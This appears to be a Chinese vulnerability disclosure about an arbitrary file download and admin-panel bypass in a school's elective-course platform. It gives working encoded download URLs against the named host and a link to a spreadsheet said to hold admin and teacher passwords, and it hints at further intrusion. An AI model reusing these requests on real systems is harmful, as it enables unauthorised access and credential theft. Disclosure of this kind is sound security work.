某知名教育网软件任意文件下载漏洞

### 简要描述： 某知名教育网软件出现任意文件下载漏洞，导致整个服务器处于危险之中！ ### 详细说明： 举例：ELECTIVE.SFLS.CN:8080，释锐校校用平台。 用自己的账户登录上去，什么也没有。 [<img src="https://images.seebug.org/upload/201401/10121123a352a55f094471febe923a381d7d75ad.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/10121123a352a55f094471febe923a381d7d75ad.png) 慢着？！ 把stu_index.jsp去掉，进入了管理平台，传了个asp（当然这里无用，为了演示）。 给了个下载链接：http://elective.sfls.cn:8080/us/download_file.jsp?path=97-100-103-96-110-42-92-95-104-100-105-40-45-43-44-47-43-44-44-43-43-44-48-52-47-45-40-49-45-47-52-51-48-45-44-49-41-92-110-107-&fileName=44-41-92-110-107-&remote=null 看起来像是ASCII码表…… 但是转换过来不是啊，adg`d*…… 42是怎么回事？一定是47号/ 这样一来，每个+5，出现真实链接…… 这样，就可以试试自己加密链接了…… ### 漏洞证明： [<img src="https://images.seebug.org/upload/201401/10122821a7c33ad3878e3f4856c2dc46b6dc6ee4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/10122821a7c33ad3878e3f4856c2dc46b6dc6ee4.png) http://elective.sfls.cn:8080/us/user/ssologin.jsp 下载链接：http://elective.sfls.cn:8080/us/download_file.jsp?path=112-110-96-109-42-110-110-106-103-106-98-100-105-41-101-110-107-&fileName=110-110-106-103-106-98-100-105-41-101-110-107- 意外收获： http://elective.sfls.cn:8080/us/files/tec_export.xls 管理员及教师密码 拿到管理员密码，接下来……你懂的